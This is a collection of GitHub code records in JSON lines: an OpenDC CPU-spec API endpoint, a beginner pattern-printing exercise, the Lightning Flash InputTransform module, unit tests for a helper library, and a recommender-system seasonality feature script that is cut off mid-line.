+{"seq_id":"8927581840","text":"from opendc.models.cpu import CPU\nfrom opendc.util import exceptions\nfrom opendc.util.rest import Response\n\n\ndef GET(request):\n \"\"\"Get the specs of a CPU.\"\"\"\n\n # Make sure required parameters are there\n\n try:\n request.check_required_parameters(\n path={\n 'id': 'int'\n }\n )\n\n except exceptions.ParameterError as e:\n return Response(400, e.message)\n\n # Instantiate a CPU and make sure it exists\n\n cpu = CPU.from_primary_key((request.params_path['id'],))\n\n if not cpu.exists():\n return Response(404, '{} not found.'.format(cpu))\n\n # Return this CPU\n\n return Response(\n 200,\n 'Successfully retrieved {}.'.format(cpu),\n cpu.to_JSON()\n )\n","repo_name":"atlarge-research/opendc-web-server","sub_path":"opendc/api/v1/specifications/cpus/id/endpoint.py","file_name":"endpoint.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"7"}
+{"seq_id":"33534647505","text":"\"\"\"\nGiven n as input, print the following pattern.\nInput: n=4\nOutput:\ny1 \ny1y2 \ny1y2y3 \ny1y2y3y4\n\"\"\"\n\nn = 4\npt = \"y\"\nst = \"\"\nfor i in range (1, n+1):\n st = st + pt + str(i)\n print(st)\nprint(\"---\")\n\n","repo_name":"enigmatic-cipher/JPR-M1-Task-1","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":200,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"44024870100","text":"import inspect\nfrom dataclasses import dataclass\nfrom functools import partial\nfrom typing import Any, Callable, Dict, List, Optional, Sequence, Tuple\n\nfrom pytorch_lightning.utilities import rank_zero_warn\nfrom pytorch_lightning.utilities.enums import LightningEnum\n\nfrom flash.core.data.callback import ControlFlow\nfrom flash.core.data.utilities.collate import default_collate\nfrom flash.core.data.utils import _STAGES_PREFIX\nfrom flash.core.utilities.stages import RunningStage\nfrom flash.core.utilities.types import INPUT_TRANSFORM_TYPE\n\n\nclass InputTransformPlacement(LightningEnum):\n PER_SAMPLE_TRANSFORM = \"per_sample_transform\"\n PER_BATCH_TRANSFORM = \"per_batch_transform\"\n COLLATE = \"collate\"\n PER_SAMPLE_TRANSFORM_ON_DEVICE = \"per_sample_transform_on_device\"\n PER_BATCH_TRANSFORM_ON_DEVICE = \"per_batch_transform_on_device\"\n\n\nINVALID_STAGES_FOR_INPUT_TRANSFORMS = [RunningStage.SANITY_CHECKING, RunningStage.TUNING]\n\n\n@dataclass\nclass _InputTransformPerStage:\n collate_in_worker: bool\n transforms: Optional[Dict[str, Callable]] = None\n\n\n@dataclass\nclass InputTransform:\n def __post_init__(self):\n self.callbacks: Optional[List] = None\n\n # used to keep track of provided transforms\n self._transform: Dict[RunningStage, _InputTransformPerStage] = {}\n\n # For all the stages possible, set/load the transforms.\n for stage in RunningStage:\n if stage not in INVALID_STAGES_FOR_INPUT_TRANSFORMS:\n self._populate_transforms_for_stage(stage)\n\n def current_transform(self, stage: RunningStage, current_fn: str) -> Callable:\n return self._transform[stage].transforms.get(current_fn, self._identity)\n\n ########################\n # PER SAMPLE TRANSFORM #\n ########################\n\n def per_sample_transform(self) -> Callable:\n \"\"\"Defines the transform to be applied on a single sample on cpu for all stages stage.\n\n The input data of the transform would have the following form::\n\n {\n DataKeys.INPUT: ...,\n DataKeys.TARGET: ...,\n DataKeys.METADATA: ...,\n }\n\n You would need to use :class:`flash.core.data.transforms.ApplyToKeys` as follows:\n\n .. code-block:: python\n\n from flash.core.data.transforms import ApplyToKeys\n\n\n class MyInputTransform(InputTransform):\n def per_sample_transform(self) -> Callable:\n return ApplyToKeys(\"input\", my_func)\n\n \"\"\"\n pass\n\n def train_per_sample_transform(self) -> Callable:\n \"\"\"Defines the transform to be applied on a single sample on cpu for the training stage.\n\n The input data of the transform would have the following form::\n\n {\n DataKeys.INPUT: ...,\n DataKeys.TARGET: ...,\n DataKeys.METADATA: ...,\n }\n\n \"\"\"\n return self.per_sample_transform()\n\n def val_per_sample_transform(self) -> Callable:\n \"\"\"Defines the transform to be applied on a single sample on cpu for the validating stage.\n\n The input data of the transform would have the following form::\n\n {\n DataKeys.INPUT: ...,\n DataKeys.TARGET: ...,\n DataKeys.METADATA: ...,\n }\n\n You would need to use :class:`flash.core.data.transforms.ApplyToKeys` as follows:\n\n .. code-block:: python\n\n from flash.core.data.transforms import ApplyToKeys\n\n\n class MyInputTransform(InputTransform):\n def per_sample_transform(self) -> Callable:\n return ApplyToKeys(\"input\", my_func)\n\n \"\"\"\n return self.per_sample_transform()\n\n def test_per_sample_transform(self) -> Callable:\n \"\"\"Defines the transform to be applied on a single sample on cpu for the testing stage.\n\n The input data of the transform would have the following form::\n\n {\n DataKeys.INPUT: ...,\n DataKeys.TARGET: ...,\n DataKeys.METADATA: ...,\n }\n\n \"\"\"\n return self.per_sample_transform()\n\n def predict_per_sample_transform(self) -> Callable:\n \"\"\"Defines the transform to be applied on a single sample on cpu for the predicting stage.\n\n The input data of the transform would have the following form::\n\n {\n DataKeys.INPUT: ...,\n DataKeys.TARGET: ...,\n DataKeys.METADATA: ...,\n }\n\n You would need to use :class:`flash.core.data.transforms.ApplyToKeys` as follows:\n\n .. code-block:: python\n\n from flash.core.data.transforms import ApplyToKeys\n\n\n class MyInputTransform(InputTransform):\n def per_sample_transform(self) -> Callable:\n return ApplyToKeys(\"input\", my_func)\n\n \"\"\"\n return self.per_sample_transform()\n\n def serve_per_sample_transform(self) -> Callable:\n \"\"\"Defines the transform to be applied on a single sample on cpu for the serving stage.\n\n The input data of the transform would have the following form::\n\n {\n DataKeys.INPUT: ...,\n DataKeys.TARGET: ...,\n DataKeys.METADATA: ...,\n }\n\n You would need to use :class:`flash.core.data.transforms.ApplyToKeys` as follows:\n\n .. code-block:: python\n\n from flash.core.data.transforms import ApplyToKeys\n\n\n class MyInputTransform(InputTransform):\n def per_sample_transform(self) -> Callable:\n return ApplyToKeys(\"input\", my_func)\n\n \"\"\"\n return self.per_sample_transform()\n\n ##################################\n # PER SAMPLE TRANSFORM ON DEVICE #\n ##################################\n\n def per_sample_transform_on_device(self) -> Callable:\n \"\"\"Defines the transform to be applied on a single sample on device for all stages stage.\n\n The input data of the transform would have the following form::\n\n {\n DataKeys.INPUT: ...,\n DataKeys.TARGET: ...,\n DataKeys.METADATA: ...,\n }\n\n You would need to use :class:`flash.core.data.transforms.ApplyToKeys` as follows:\n\n .. code-block:: python\n\n from flash.core.data.transforms import ApplyToKeys\n\n\n class MyInputTransform(InputTransform):\n def per_sample_transform_on_device(self) -> Callable:\n return ApplyToKeys(\"input\", my_func)\n\n \"\"\"\n pass\n\n def train_per_sample_transform_on_device(self) -> Callable:\n \"\"\"Defines the transform to be applied on a single sample on device for the training stage.\n\n The input data of the transform would have the following form::\n\n {\n DataKeys.INPUT: ...,\n DataKeys.TARGET: ...,\n DataKeys.METADATA: ...,\n }\n\n \"\"\"\n return self.per_sample_transform_on_device()\n\n def val_per_sample_transform_on_device(self) -> Callable:\n \"\"\"Defines the transform to be applied on a single sample on device for the validating stage.\n\n The input data of the transform would have the following form::\n\n {\n DataKeys.INPUT: ...,\n DataKeys.TARGET: ...,\n DataKeys.METADATA: ...,\n }\n\n You would need to use :class:`flash.core.data.transforms.ApplyToKeys` as follows:\n\n .. code-block:: python\n\n from flash.core.data.transforms import ApplyToKeys\n\n\n class MyInputTransform(InputTransform):\n def per_sample_transform_on_device(self) -> Callable:\n return ApplyToKeys(\"input\", my_func)\n\n \"\"\"\n return self.per_sample_transform_on_device()\n\n def test_per_sample_transform_on_device(self) -> Callable:\n \"\"\"Defines the transform to be applied on a single sample on device for the testing stage.\n\n The input data of the transform would have the following form::\n\n {\n DataKeys.INPUT: ...,\n DataKeys.TARGET: ...,\n DataKeys.METADATA: ...,\n }\n\n \"\"\"\n return self.per_sample_transform_on_device()\n\n def predict_per_sample_transform_on_device(self) -> Callable:\n \"\"\"Defines the transform to be applied on a single sample on device for the predicting stage.\n\n The input data of the transform would have the following form::\n\n {\n DataKeys.INPUT: ...,\n DataKeys.TARGET: ...,\n DataKeys.METADATA: ...,\n }\n\n You would need to use :class:`flash.core.data.transforms.ApplyToKeys` as follows:\n\n .. code-block:: python\n\n from flash.core.data.transforms import ApplyToKeys\n\n\n class MyInputTransform(InputTransform):\n def per_sample_transform_on_device(self) -> Callable:\n return ApplyToKeys(\"input\", my_func)\n\n \"\"\"\n return self.per_sample_transform_on_device()\n\n def serve_per_sample_transform_on_device(self) -> Callable:\n \"\"\"Defines the transform to be applied on a single sample on device for the serving stage.\n\n The input data of the transform would have the following form::\n\n {\n DataKeys.INPUT: ...,\n DataKeys.TARGET: ...,\n DataKeys.METADATA: ...,\n }\n\n You would need to use :class:`flash.core.data.transforms.ApplyToKeys` as follows:\n\n .. code-block:: python\n\n from flash.core.data.transforms import ApplyToKeys\n\n\n class MyInputTransform(InputTransform):\n def serve_per_sample_transform_on_device(self) -> Callable:\n return ApplyToKeys(\"input\", my_func)\n\n \"\"\"\n return self.per_sample_transform_on_device()\n\n #######################\n # PER BATCH TRANSFORM #\n #######################\n\n def per_batch_transform(self) -> Callable:\n \"\"\"Defines the transform to be applied on a batch of data on cpu for all stages stage.\n\n The input data of the transform would have the following form::\n\n {\n DataKeys.INPUT: ...,\n DataKeys.TARGET: ...,\n DataKeys.METADATA: ...,\n }\n\n You would need to use :class:`flash.core.data.transforms.ApplyToKeys` as follows:\n\n .. code-block:: python\n\n from flash.core.data.transforms import ApplyToKeys\n\n\n class MyInputTransform(InputTransform):\n def per_batch_transform(self) -> Callable:\n return ApplyToKeys(\"input\", my_func)\n\n \"\"\"\n pass\n\n def train_per_batch_transform(self) -> Callable:\n \"\"\"Defines the transform to be applied on a batch of data on cpu for the training stage.\n\n The input data of the transform would have the following form::\n\n {\n DataKeys.INPUT: ...,\n DataKeys.TARGET: ...,\n DataKeys.METADATA: ...,\n }\n\n \"\"\"\n return self.per_batch_transform()\n\n def val_per_batch_transform(self) -> Callable:\n \"\"\"Defines the transform to be applied on a batch of data on cpu for the validating stage.\n\n The input data of the transform would have the following form::\n\n {\n DataKeys.INPUT: ...,\n DataKeys.TARGET: ...,\n DataKeys.METADATA: ...,\n }\n\n You would need to use :class:`flash.core.data.transforms.ApplyToKeys` as follows:\n\n .. code-block:: python\n\n from flash.core.data.transforms import ApplyToKeys\n\n\n class MyInputTransform(InputTransform):\n def per_batch_transform(self) -> Callable:\n return ApplyToKeys(\"input\", my_func)\n\n \"\"\"\n return self.per_batch_transform()\n\n def test_per_batch_transform(self) -> Callable:\n \"\"\"Defines the transform to be applied on a batch of data on cpu for the testing stage.\n\n The input data of the transform would have the following form::\n\n {\n DataKeys.INPUT: ...,\n DataKeys.TARGET: ...,\n DataKeys.METADATA: ...,\n }\n\n \"\"\"\n return self.per_batch_transform()\n\n def predict_per_batch_transform(self) -> Callable:\n \"\"\"Defines the transform to be applied on a batch of data on cpu for the predicting stage.\n\n The input data of the transform would have the following form::\n\n {\n DataKeys.INPUT: ...,\n DataKeys.TARGET: ...,\n DataKeys.METADATA: ...,\n }\n\n You would need to use :class:`flash.core.data.transforms.ApplyToKeys` as follows:\n\n .. code-block:: python\n\n from flash.core.data.transforms import ApplyToKeys\n\n\n class MyInputTransform(InputTransform):\n def per_batch_transform(self) -> Callable:\n return ApplyToKeys(\"input\", my_func)\n\n \"\"\"\n return self.per_batch_transform()\n\n def serve_per_batch_transform(self) -> Callable:\n \"\"\"Defines the transform to be applied on a batch of data on cpu for the serving stage.\n\n The input data of the transform would have the following form::\n\n {\n DataKeys.INPUT: ...,\n DataKeys.TARGET: ...,\n DataKeys.METADATA: ...,\n }\n\n You would need to use :class:`flash.core.data.transforms.ApplyToKeys` as follows:\n\n .. code-block:: python\n\n from flash.core.data.transforms import ApplyToKeys\n\n\n class MyInputTransform(InputTransform):\n def per_batch_transform(self) -> Callable:\n return ApplyToKeys(\"input\", my_func)\n\n \"\"\"\n return self.per_batch_transform()\n\n #################################\n # PER BATCH TRANSFORM ON DEVICE #\n #################################\n\n def per_batch_transform_on_device(self) -> Callable:\n \"\"\"Defines the transform to be applied on a batch of data on device for all stages stage.\n\n The input data of the transform would have the following form::\n\n {\n DataKeys.INPUT: ...,\n DataKeys.TARGET: ...,\n DataKeys.METADATA: ...,\n }\n\n You would need to use :class:`flash.core.data.transforms.ApplyToKeys` as follows:\n\n .. code-block:: python\n\n from flash.core.data.transforms import ApplyToKeys\n\n\n class MyInputTransform(InputTransform):\n def per_batch_transform_on_device(self) -> Callable:\n return ApplyToKeys(\"input\", my_func)\n\n \"\"\"\n pass\n\n def train_per_batch_transform_on_device(self) -> Callable:\n \"\"\"Defines the transform to be applied on a batch of data on device for the training stage.\n\n The input data of the transform would have the following form::\n\n {\n DataKeys.INPUT: ...,\n DataKeys.TARGET: ...,\n DataKeys.METADATA: ...,\n }\n\n \"\"\"\n return self.per_batch_transform_on_device()\n\n def val_per_batch_transform_on_device(self) -> Callable:\n \"\"\"Defines the transform to be applied on a batch of data on device for the validating stage.\n\n The input data of the transform would have the following form::\n\n {\n DataKeys.INPUT: ...,\n DataKeys.TARGET: ...,\n DataKeys.METADATA: ...,\n }\n\n You would need to use :class:`flash.core.data.transforms.ApplyToKeys` as follows:\n\n .. code-block:: python\n\n from flash.core.data.transforms import ApplyToKeys\n\n\n class MyInputTransform(InputTransform):\n def per_batch_transform_on_device(self) -> Callable:\n return ApplyToKeys(\"input\", my_func)\n\n \"\"\"\n return self.per_batch_transform_on_device()\n\n def test_per_batch_transform_on_device(self) -> Callable:\n \"\"\"Defines the transform to be applied on a batch of data on device for the testing stage.\n\n The input data of the transform would have the following form::\n\n {\n DataKeys.INPUT: ...,\n DataKeys.TARGET: ...,\n DataKeys.METADATA: ...,\n }\n\n \"\"\"\n return self.per_batch_transform_on_device()\n\n def predict_per_batch_transform_on_device(self) -> Callable:\n \"\"\"Defines the transform to be applied on a batch of data on device for the predicting stage.\n\n The input data of the transform would have the following form::\n\n {\n DataKeys.INPUT: ...,\n DataKeys.TARGET: ...,\n DataKeys.METADATA: ...,\n }\n\n You would need to use :class:`flash.core.data.transforms.ApplyToKeys` as follows:\n\n .. code-block:: python\n\n from flash.core.data.transforms import ApplyToKeys\n\n\n class MyInputTransform(InputTransform):\n def per_batch_transform_on_device(self) -> Callable:\n return ApplyToKeys(\"input\", my_func)\n\n \"\"\"\n return self.per_batch_transform_on_device()\n\n def serve_per_batch_transform_on_device(self) -> Callable:\n \"\"\"Defines the transform to be applied on a batch of data on device for the serving stage.\n\n The input data of the transform would have the following form::\n\n {\n DataKeys.INPUT: ...,\n DataKeys.TARGET: ...,\n DataKeys.METADATA: ...,\n }\n\n You would need to use :class:`flash.core.data.transforms.ApplyToKeys` as follows:\n\n .. code-block:: python\n\n from flash.core.data.transforms import ApplyToKeys\n\n\n class MyInputTransform(InputTransform):\n def serve_per_batch_transform_on_device(self) -> Callable:\n return ApplyToKeys(\"input\", my_func)\n\n \"\"\"\n return self.per_batch_transform_on_device()\n\n ###########\n # COLLATE #\n ###########\n\n def collate(self) -> Callable:\n \"\"\"Defines the transform to be applied on a list of sample to create a batch for all stages.\"\"\"\n return default_collate\n\n def train_collate(self) -> Callable:\n \"\"\"Defines the transform to be applied on a list of training sample to create a training batch.\"\"\"\n return self.collate()\n\n def val_collate(self) -> Callable:\n \"\"\"Defines the transform to be applied on a list of validating sample to create a validating batch.\"\"\"\n return self.collate()\n\n def test_collate(self) -> Callable:\n \"\"\"Defines the transform to be applied on a list of testing sample to create a testing batch.\"\"\"\n return self.collate()\n\n def predict_collate(self) -> Callable:\n \"\"\"Defines the transform to be applied on a list of predicting sample to create a predicting batch.\"\"\"\n return self.collate()\n\n def serve_collate(self) -> Callable:\n \"\"\"Defines the transform to be applied on a list of serving sample to create a serving batch.\"\"\"\n return self.collate()\n\n ########################################\n # HOOKS CALLED INTERNALLY WITHIN FLASH #\n ########################################\n\n def _per_sample_transform(self, sample: Any, stage: RunningStage) -> Any:\n fn = self.current_transform(stage=stage, current_fn=\"per_sample_transform\")\n if isinstance(sample, list):\n return [fn(s) for s in sample]\n return fn(sample)\n\n def _per_batch_transform(self, batch: Any, stage: RunningStage) -> Any:\n \"\"\"Transforms to apply to a whole batch (if possible use this for efficiency).\n\n .. note:: This option is mutually exclusive with :meth:`per_sample_transform_on_device`, since if both are\n specified, uncollation has to be applied.\n\n \"\"\"\n return self.current_transform(stage=stage, current_fn=\"per_batch_transform\")(batch)\n\n def _collate(self, samples: Sequence, stage: RunningStage) -> Any:\n \"\"\"Transform to convert a sequence of samples to a collated batch.\"\"\"\n return self.current_transform(stage=stage, current_fn=\"collate\")(samples)\n\n def _per_sample_transform_on_device(self, sample: Any, stage: RunningStage) -> Any:\n \"\"\"Transforms to apply to the data before the collation (per-sample basis).\n\n .. note:: This option is mutually exclusive with :meth:`per_batch_transform`, since if both are\n specified, uncollation has to be applied. .. note:: This function won't be called within the dataloader\n workers, since to make that happen each of the workers would have to create it's own CUDA-context which\n would pollute GPU memory (if on GPU).\n\n \"\"\"\n fn = self.current_transform(stage=stage, current_fn=\"per_sample_transform_on_device\")\n if isinstance(sample, list):\n return [fn(s) for s in sample]\n return fn(sample)\n\n def _per_batch_transform_on_device(self, batch: Any, stage: RunningStage) -> Any:\n \"\"\"Transforms to apply to a whole batch (if possible use this for efficiency).\n\n .. note:: This function won't be called within the dataloader workers, since to make that happen each of\n the workers would have to create it's own CUDA-context which would pollute GPU memory (if on GPU).\n\n \"\"\"\n return self.current_transform(stage=stage, current_fn=\"per_batch_transform_on_device\")(batch)\n\n #############\n # UTILITIES #\n #############\n\n def inject_collate_fn(self, collate_fn: Callable):\n # For all the stages possible, set collate function\n if collate_fn is not default_collate:\n for stage in RunningStage:\n if stage not in [RunningStage.SANITY_CHECKING, RunningStage.TUNING]:\n self._transform[stage].transforms[InputTransformPlacement.COLLATE.value] = collate_fn\n\n def _populate_transforms_for_stage(self, running_stage: RunningStage):\n transform, collate_in_worker = self.__check_transforms(\n transform=self.__resolve_transforms(running_stage),\n )\n\n self._transform[running_stage] = _InputTransformPerStage(\n collate_in_worker=collate_in_worker,\n transforms=transform,\n )\n\n def __resolve_transforms(self, running_stage: RunningStage) -> Optional[Dict[str, Callable]]:\n transforms = {}\n stage = _STAGES_PREFIX[running_stage]\n\n # iterate over all transforms hook name\n for transform_name in InputTransformPlacement:\n transform_name = transform_name.value\n\n method_name = f\"{stage}_{transform_name}\"\n\n # get associated transform\n try:\n fn = getattr(self, method_name)()\n except AttributeError as e:\n raise AttributeError(\n str(e) + \". Make sure you include a call to super().__init__(...) in your __init__ after setting \"\n \"all attributes.\"\n )\n\n if fn is None:\n continue\n\n if not callable(fn):\n raise TypeError(f\"The hook {method_name} should return a callable.\")\n\n transforms[transform_name] = fn\n\n return transforms\n\n def __check_transforms(self, transform: Dict[str, Callable]) -> Tuple[Dict[str, Callable], Optional[bool]]:\n is_per_batch_transform_in = \"per_batch_transform\" in transform\n is_per_sample_transform_on_device_in = \"per_sample_transform_on_device\" in transform\n\n if is_per_batch_transform_in and is_per_sample_transform_on_device_in:\n raise TypeError(\n f\"{transform}: `per_batch_transform` and `per_sample_transform_on_device` are mutually exclusive.\"\n )\n\n collate_in_worker: Optional[bool] = not is_per_sample_transform_on_device_in\n\n return transform, collate_in_worker\n\n @staticmethod\n def _identity(x: Any) -> Any:\n return x\n\n def __str__(self) -> str:\n return f\"{self.__class__.__name__}(\" + f\"transform={self._transform})\"\n\n\ndef create_or_configure_input_transform(\n transform: INPUT_TRANSFORM_TYPE,\n transform_kwargs: Optional[Dict] = None,\n) -> Optional[InputTransform]:\n if not transform_kwargs:\n transform_kwargs = {}\n\n if isinstance(transform, InputTransform):\n return transform\n\n if inspect.isclass(transform) and issubclass(transform, InputTransform):\n # Deprecation Warning\n rank_zero_warn(\n \"Please pass an instantiated object of the `InputTransform` class. Passing the Class and keyword arguments\"\n \" separately has been deprecated since v0.8.0 and will be removed in v0.9.0.\",\n stacklevel=8,\n category=FutureWarning,\n )\n return transform(**transform_kwargs)\n\n if isinstance(transform, partial):\n return transform(**transform_kwargs)\n\n if not transform:\n return None\n\n raise ValueError(f\"The format for the transform isn't correct. Found {transform}\")\n\n\nclass _InputTransformProcessor:\n \"\"\"\n This class is used to encapsulate the following functions of an `InputTransform` Object:\n Inside a worker:\n per_sample_transform: Function to transform an individual sample\n collate: Function to merge sample into a batch\n per_batch_transform: Function to transform an individual batch\n\n Inside main process:\n per_sample_transform_on_device: Function to transform an individual sample\n collate: Function to merge sample into a batch\n per_batch_transform_on_device: Function to transform an individual batch\n \"\"\"\n\n def __init__(\n self,\n input_transform: InputTransform,\n collate_fn: Callable,\n per_sample_transform: Callable,\n per_batch_transform: Callable,\n stage: RunningStage,\n apply_per_sample_transform: bool = True,\n on_device: bool = False,\n ):\n super().__init__()\n self.input_transform = input_transform\n self.callback = ControlFlow(self.input_transform.callbacks or [])\n self.collate_fn = collate_fn\n self.per_sample_transform = per_sample_transform\n self.per_batch_transform = per_batch_transform\n self.apply_per_sample_transform = apply_per_sample_transform\n self.stage = stage\n self.on_device = on_device\n\n def __call__(self, samples: Sequence[Any]) -> Any:\n if not self.on_device:\n for sample in samples:\n self.callback.on_load_sample(sample, self.stage)\n\n if self.apply_per_sample_transform:\n list_samples = [samples] if not isinstance(samples, list) else samples\n\n transformed_samples = [self.per_sample_transform(sample, self.stage) for sample in list_samples]\n\n for sample in transformed_samples:\n if self.on_device:\n self.callback.on_per_sample_transform_on_device(sample, self.stage)\n else:\n self.callback.on_per_sample_transform(sample, self.stage)\n\n collated_samples = self.collate_fn(transformed_samples, self.stage)\n self.callback.on_collate(collated_samples, self.stage)\n else:\n collated_samples = samples\n\n transformed_collated_samples = self.per_batch_transform(collated_samples, self.stage)\n if self.on_device:\n self.callback.on_per_batch_transform_on_device(transformed_collated_samples, self.stage)\n else:\n self.callback.on_per_batch_transform(transformed_collated_samples, self.stage)\n return transformed_collated_samples\n\n def __str__(self) -> str:\n # todo: define repr function which would take object and string attributes to be shown\n return (\n \"_InputTransformProcessor:\\n\"\n f\"\\t(per_sample_transform): {str(self.per_sample_transform)}\\n\"\n f\"\\t(collate_fn): {str(self.collate_fn)}\\n\"\n f\"\\t(per_batch_transform): {str(self.per_batch_transform)}\\n\"\n f\"\\t(apply_per_sample_transform): {str(self.apply_per_sample_transform)}\\n\"\n f\"\\t(on_device): {str(self.on_device)}\\n\"\n f\"\\t(stage): {str(self.stage)}\"\n )\n\n\ndef __make_collates(input_transform: InputTransform, on_device: bool, collate: Callable) -> Tuple[Callable, Callable]:\n \"\"\"Returns the appropriate collate functions based on whether the transforms happen in a DataLoader worker or on the\n device (main process).\"\"\"\n if on_device:\n return input_transform._identity, collate\n return collate, input_transform._identity\n\n\ndef __configure_worker_and_device_collate_fn(\n running_stage: RunningStage, input_transform: InputTransform\n) -> Tuple[Callable, Callable]:\n transform_for_stage: _InputTransformPerStage = input_transform._transform[running_stage]\n\n worker_collate_fn, device_collate_fn = __make_collates(\n input_transform, not transform_for_stage.collate_in_worker, input_transform._collate\n )\n\n return worker_collate_fn, device_collate_fn\n\n\ndef create_worker_input_transform_processor(\n running_stage: RunningStage, input_transform: InputTransform\n) -> _InputTransformProcessor:\n \"\"\"This utility is used to create the 2 `_InputTransformProcessor` objects which contain the transforms used as the\n DataLoader `collate_fn`.\"\"\"\n worker_collate_fn, _ = __configure_worker_and_device_collate_fn(\n running_stage=running_stage, input_transform=input_transform\n )\n return _InputTransformProcessor(\n input_transform,\n worker_collate_fn,\n input_transform._per_sample_transform,\n input_transform._per_batch_transform,\n running_stage,\n )\n\n\ndef create_device_input_transform_processor(\n running_stage: RunningStage, input_transform: InputTransform\n) -> _InputTransformProcessor:\n \"\"\"This utility is used to create a `_InputTransformProcessor` object which contain the transforms used as the\n DataModule `on_after_batch_transfer` hook.\"\"\"\n _, device_collate_fn = __configure_worker_and_device_collate_fn(\n running_stage=running_stage, input_transform=input_transform\n )\n return _InputTransformProcessor(\n input_transform,\n device_collate_fn,\n input_transform._per_sample_transform_on_device,\n input_transform._per_batch_transform_on_device,\n running_stage,\n apply_per_sample_transform=device_collate_fn != input_transform._identity,\n on_device=True,\n )\n","repo_name":"Lightning-Universe/lightning-flash","sub_path":"src/flash/core/data/io/input_transform.py","file_name":"input_transform.py","file_ext":"py","file_size_in_byte":30739,"program_lang":"python","lang":"en","doc_type":"code","stars":1717,"dataset":"github-code","pt":"7"}
+{"seq_id":"26906075940","text":"import nafuma.auxillary as aux\nimport os\n\ndef test_swap_values():\n\n\n test_dict = {'test1': 1, 'test2': 2}\n key1 = 'test1'\n key2 = 'test2'\n\n oldval1 = test_dict[key1]\n oldval2 = test_dict[key2]\n\n new_dict = aux.swap_values(options=test_dict, key1=key1, key2=key2) \n\n assert (test_dict[key1] == oldval2) and (test_dict[key2] == oldval1)\n\n\ndef test_ceil() -> None:\n\n assert aux.ceil(1.05, 0.5) == 1.5\n assert aux.ceil(1.05, 1) == 2.0\n assert aux.ceil(1.1, 0.2) == 1.2\n\n\ndef test_floor() -> None:\n\n assert aux.floor(2.02, 1) == 2.0\n assert aux.floor(2.02, 0.01) == 2.02\n assert aux.floor(2.013, 0.01) == 2.01\n\n\n\ndef test_options() -> None:\n\n\n options = {}\n\n default_options = {\n 'test1': 1,\n 'test2': 2, \n 'test3': 3,\n 'test4': 4,\n 'test5': 5,\n }\n\n\n options = aux.update_options(options=options, default_options=default_options)\n\n assert options['test1'] == default_options['test1']\n\n\ndef test_save_options() -> None:\n \n options = {'test1': 1, 'test2': 2}\n path = 'tmp.dat'\n\n aux.save_options(options, path)\n\n assert os.path.isfile(path)\n\n os.remove(path)\n\n\ndef test_load_options() -> None:\n \n options = {'test1': 1, 'test2': 2}\n path = 'tmp.dat'\n\n aux.save_options(options, path)\n\n loaded_options = aux.load_options(path)\n\n assert (loaded_options['test1'] == 1) and (loaded_options['test2'] == 2)\n\n os.remove(path)\n","repo_name":"rasmusthog/nafuma","sub_path":"nafuma/test/test_auxillary.py","file_name":"test_auxillary.py","file_ext":"py","file_size_in_byte":1440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"6319021647","text":"import math\nimport os\n\nimport pandas as pd\nimport numpy as np\nfrom tqdm import tqdm\nimport tensorflow as tf\nfrom tensorflow import keras\nimport keras.backend as K\n\nfrom RecSys_Course_AT_PoliMi.Pipeline.data_extraction import get_dataframes\n\ntqdm.pandas()\n\n\ndef compute_mean(x, y):\n if y != 0:\n return x / y\n else:\n return -1\n\n\ndef compute_quartet_entropy(wi, sp, su, au):\n total = wi + sp + su + au\n if total == 0:\n return -1\n if wi == 0:\n wi_coeff = 0\n else:\n wi_coeff = - (wi / total) * math.log2(wi / total)\n if sp == 0:\n sp_coeff = 0\n else:\n sp_coeff = - (sp / total) * math.log2(sp / total)\n if su == 0:\n su_coeff = 0\n else:\n su_coeff = - (su / total) * math.log2(su / total)\n if au == 0:\n au_coeff = 0\n else:\n au_coeff = - (au / total) * math.log2(au / total)\n return 1 - ((wi_coeff + sp_coeff + su_coeff + au_coeff) / 2)\n\n\ndef compute_season(x, record):\n month = x.date.month\n elems = record[x.item_id]\n if month in [12, 1, 2]:\n elems[0] += 1\n elif month in [3, 4, 5]:\n elems[1] += 1\n elif month in [6, 7, 8]:\n elems[2] += 1\n else:\n elems[3] += 1\n\n\ndef compute_seasonality_tendency(df, attributes):\n print('Computing Seasonality Tendency...')\n assert len(attributes) == 4\n return df.progress_apply(lambda x:\n compute_quartet_entropy(x[attributes[0]], x[attributes[1]],\n x[attributes[2]], x[attributes[3]]),\n axis=1)\n\n\ndef compute_season_tendency(df, target, columns):\n assert target in columns\n print('Computing {} Tendency...'.format(target))\n return df.progress_apply(lambda x:\n compute_mean(x[target],\n x[columns[0]] + x[columns[1]] +\n x[columns[2]] + x[columns[3]]),\n axis=1)\n\n\ndef extract_season(sessions, item_features, columns, attr_type='views'):\n assert type(attr_type) == str\n assert len(columns) == 4\n sessions.date = pd.to_datetime(sessions.date)\n record = {item: [0, 0, 0, 0] for item in item_features.item_id.unique()}\n\n print('Building Statistics...')\n sessions.progress_apply(lambda x: compute_season(x, record), axis=1)\n season_df = pd.DataFrame.from_dict(record, orient='index', columns=columns)\n season_df['seasonality_' + attr_type + '_tendency'] = compute_seasonality_tendency(season_df, columns)\n season_df[columns[0] + '_tendency'] = compute_season_tendency(season_df, columns[0], columns)\n season_df[columns[1] + '_tendency'] = compute_season_tendency(season_df, columns[1], columns)\n season_df[columns[2] + '_tendency'] = compute_season_tendency(season_df, columns[2], columns)\n season_df[columns[3] + '_tendency'] = compute_season_tendency(season_df, columns[3], columns)\n return season_df\n\n\ndef get_item_attributes(dataset_path, path, init_date='2020-01-01', end_date='2021-05-31', use_base_features=False):\n \"\"\"\n init_date is inclusive\n end_date is exclusive\n dataset_path is the relative path to the Dataset directory to pass to get_dataframes\n path is the name of the file to load/create (if not present it will create a file\n with name 'path_init_date_end_date.csv')\n When use_base_features is True creates simil-one-hot-encoding based on original dataset features\n \"\"\"\n path = path.split('.csv')[0] + '_' + init_date.replace('-', '_') + '_' + end_date.replace('-', '_') + '.csv'\n if os.path.exists(path):\n print('Attributes already computed, reloading...')\n return pd.read_csv(path)\n print('Attributes not computed, creating...')\n item_features_df, train_sessions_df, train_purchases_df, test_sessions_df, candidate_items_df = get_dataframes(\n dataset_path)\n train_sessions_df = train_sessions_df[(train_sessions_df.date >= init_date) & (train_sessions_df.date < end_date)]\n train_purchases_df = train_purchases_df[\n (train_purchases_df.date >= init_date) & (train_purchases_df.date <= end_date)]\n\n columns_views = ['winter_views', 